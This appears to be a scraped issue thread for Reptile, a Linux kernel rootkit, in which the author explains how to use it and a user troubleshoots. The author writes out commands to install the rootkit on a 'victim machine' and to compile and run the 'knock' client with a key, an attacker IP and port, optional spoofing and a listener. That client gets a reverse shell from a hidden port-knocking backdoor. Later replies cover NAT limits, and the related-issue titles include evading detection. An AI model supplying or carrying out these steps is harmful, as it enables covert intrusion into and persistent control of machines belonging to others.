Comments (11)
You have to install the rootkit only on victim machine. On your attacker machine you will only run the client.
I did the shellscript and makefiles to generate the client on the victim to give you a way to attack from the victim to another hosts in the network. But from your main attack machine perspective you only have to compile knock.c just typing:
cd Reptile/sbin
gcc knock.c -o knock
./knock
You have to chose the protocol, target address, source address (if you want spoof your address), the payload with key+ip+port.
You dont need to use netcat, cause I already have implement the listener, just use -l options at the end. Something like that:
./knock -x icmp -s (spoofed ip) -t (target IP) -d "F0rb1dd3n (attacker IP) (attacker port)" -l
Take a look into the code and change the key on heavens_door.c if you want.
I think it helps you.
F0rb1dd3n
from reptile.
Hello, Should I run ./heavens_door command first on the victim machine?
I run ./heavens_door command on the victim machine and run lsof -i tcp:80, but nothing shows on the screen. I think it should listen on the port 80
from reptile.
No man, Reptile already run heavens_door for you and hide her processes. You just have to run ./installer.sh install and nothing more. Also, heavens_door doesnt listen any port, that is a port knocking backdoor, she just inspect the packets that are being received on the machine, and returns a shell if is a right packet.
Originally I have configured just to inspect packets received via ICMP or TCP on port 80 or UDP on port 53. But that is irrelevant, you can change this. There is not a listen port, but a inspection of packets that are targeting a port.
from reptile.
Hello, I have doubt in the <reverse IP> in the line below:
-d Data to knock on backdoor: "<key> <reverse IP> <reverse Port>"
If my real source ip is 192.168.2.13, should I use -d "F0rb1dd3n 31.2.861.291 4444" in reverse form instead of -d "F0rb1dd3n 192.168.2.13 4444"?
from reptile.
no man, you have to use the normal form -d "F0rb1dd3n 192.168.2.13 4444"
The client will do all the job for you.
from reptile.
@rabbpigPan are you having any another trouble? Can we close this issue?
from reptile.
Yes, I am still having trouble in getting the backdoor to work. After I entered the correct source IP and target IP,
Knock Knock on Heaven's (Back)Door
Written by: F0rb1dd3n
Knock knock Neo...
[+] Knocking with UDP protocol
.........
[+] 59 bytes was sent
it only showed the information above and didn't prompt the reverse shell for a long time.
Does it support the NAT network or only work on the local network?
from reptile.
This backdoor does not support NAT, only local network
from reptile.
Thanks for your reply. You can close the issue now.
from reptile.
这个后门不支持NAT,只支持本地网络
Does not support the public network, only supports the internal network?
from reptile.
Just the internal, unless you have a NAT
from reptile.
Related Issues (20)
- is there gonna be kernel 5.X support? HOT 7
- make error: implicit declaration of function 'memzero_explicit' [-Werror=implicit-function-declaration] HOT 2
- tty hangs while rmmod HOT 2
- Error on running make
- Personal doubts
- Error during "make install" HOT 1
- Error with "kallsyms_on_each_symbol" at make HOT 1
- error on redhat 7
- How to prevent detection
- copy_from_user cause system crash on centos7.8 HOT 1
- Installing Error on Parrot OS HOT 1
- 12312
- linux kernel 5.0+ Compatibility HOT 1
- update for Ubunut22 and other higher version kernel
- Hide processs faile HOT 1
- help
- About memory leaks(关于内存泄漏)
- Reptile-master/kernel/include/config.h:26:25: error: expected ‘)’ before ‘HIDE’ HOT 1
- Can't open reptile_module.ko for reading HOT 4
- AMZN Connection Hide
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from reptile.